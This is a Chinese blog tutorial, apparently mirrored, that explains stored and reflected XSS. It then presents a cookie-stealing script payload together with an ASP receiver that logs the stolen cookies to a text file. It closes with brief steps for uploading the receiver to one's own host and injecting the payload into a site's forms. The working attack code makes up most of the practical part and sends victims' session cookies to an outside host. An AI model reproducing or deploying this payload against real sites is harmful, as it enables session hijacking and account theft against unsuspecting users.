zoukankan      html  css  js  c++  java

  • XSS跨站攻击

    1.XSS跨站简介 

      一类是存储型XSS,主要出现在让用户输入数据,供其他浏览此页的用户进行查看的地方,包括留言、评论、博客日志和各类表单等。应用程序从数据库中查询数据,在页面中显示出来,攻击者在相关页面输入恶意的脚本数据后,用户浏览此类页面就可能受到攻击。

      另外一类是参数型XSS,主要是将脚本加入URL地址的程序参数里,参数进入程序后在页面直接输出脚本内容,用户点击类似的恶意链接就可能受到攻击。

      传统的XSS攻击都是盘算如何盗取客户端COOKIE,然后劫持客户端和WEB服务端的会话,其他还有利用XSS进行网络钓鱼的攻击方法,这类攻击都是针对客户端进行攻击,而近年流行的XSS WORM攻击方式,是通过AJAX技术把恶意的XSS数据感染到每一个用户,可以对WEB服务造成很大的影响,间接实现了对WEB服务端的攻击。

     

    2.用到的代码是 

     

    <script>document.location='http://127.0.0.1/1.asp?msg='+document.cookie</script>

    我们还要用到一个asp接口

     1 <% 
 2 
 3 thisfile=Server.MapPath("cookie.txt") 
 4 
 5 msg=Request("msg") 
 6 
 7 set fs=server.CreateObject("scripting.filesystemobject") 
 8 
 9 set thisfile=fs.OpenTextFile(thisfile,8,True,0) 
10 
11 thisfile.WriteLine("========cookie:"&msg&"=========") 
12 
13 thisfile.close 
14 
15 set fs = nothing 
16 
17 %>

    1. server对象

     

    server对象提供对服务器上的方法和属性的访问,其中大多数方法和属性是作为实用程序的功能的,语法格式为:

     

    其中property和method分别表示属性和方法

     

    server对象的方法:

     

    creareobject:创建服务器组件的实例。

     

    execute:执行一个.asp文件

     

    getlasterror:返回一个描述错误条件的asperror对象

     

    htmlencode;将html编码应用到指定的字符串

     

    mappath:将指定的虚拟路径,无论是当前服务器上的绝对路径还是当前页的相对路径,映射为物理路径

     

    transfer:将当前所有的状态信息发送给另一个.asp文件进行处理

     

    urlencode:将url编码规则,包括转移字符,应用到字符串。

     

    2.使用server对象的createobject方法可以创建服务器组件的实例,语法格式如下:

     

    server.mappath(path)

     

    其中参数path指定要映射物理目录的相对或虚拟路径。如果path以一个正斜线(/)或反斜线()开始,mappath方法将返回路径时将path视为完整的虚拟路径;如果path不是斜线开始,mappath方法将返回相对于.asp文件已有的路径的路径。

     

    3.filesystemobject主对象。提供对计算机文件系统的访问,包括用来创建,删除,和获得有关信息以及用来操作驱动器,文件夹和文件的方法和属性。

     

    4.要创建一个文本文件并对其进行写操作,首先创建filesystemobject对象实例,然后通过调用该对象的createtextfile方法创建指定文件并返回textstream对象实例,接着使用textstream对象的方法对文件进行写操作并关闭文件

     

    5.打开文件

     

    filesystemobject对象的 opentextfile方法打开指定的文件并返回一个textstream对象,该对象可以用于对文件进行读,写和添加到结尾操作

     

    语法格式

     

    object.opentextfile(file【,iomode【,create【,format】】】)

     

    其中object是必选参数,指定vfilesystemobject对象名称

     

    filename也是必选参数,是一个字符串表达式,用于指定要打开的文件名称。

     

    iomode 是可选参数,用于指定文件的输入,输出模式:如果该参数为1,或省掉,则以只读打开文件,不能写;如果2,只能对其写 不能读,如果为8 则是在文件末尾进行写操作

     

    create是可选参数,取boolean值 指出当指定的filename不存在时是否能创建;如果为TRUE,则可以;如果false或省掉,则不能创建

     

    vformat是可选参数,如果为0 后省掉 则以ascii格式打开文件;如果为-1,以unicode格式打开文件;如果为-2,则以系统默认格式打开文件

     

    6.使用writeline方法向textstream文件写入指定字符串和新字符串,语法

     

    object.writeline(【string】)

     

    其中object是必选参数,指定textstream对象的名称。string是可选参数,指定写入的文件。如果省掉,将向文件新行字符

     

     

     

    由于我的电脑没有连网所以就只能用本地做实验 啊

     

    首先 把asp文件传到自己的空间里啊

     

    好 了

     

    再到网站提交数据啊

     

    哦忘记说了

     

    这里写的http://127.0.0.1/1.asp 是你自己传到空间的地址 后面的msg 就是这里的参数

     

    ---恢复内容结束---

    ---恢复内容结束---
  • 相关阅读:
    [Linux 004]——用户和用户组以及 Linux 权限管理(二)
    [Linux 003]——用户和用户组以及 Linux 权限管理(一)
    [Linux 002]——Linux的常用命令
    [Linux 001]——计算机和操作系统的基础知识
    给 Android 开发者的 RxJava 详解
    Mac OSX系统搭建React natvie for android 开发环境
    Java中的堆和栈的区别
    Nginx配置详解
    在博客园安家了!
    J2SE核心实战开发—— 集合类框架
  • 原文地址:https://www.cnblogs.com/goodhacker/p/3246427.html
Copyright © 2011-2022 走看看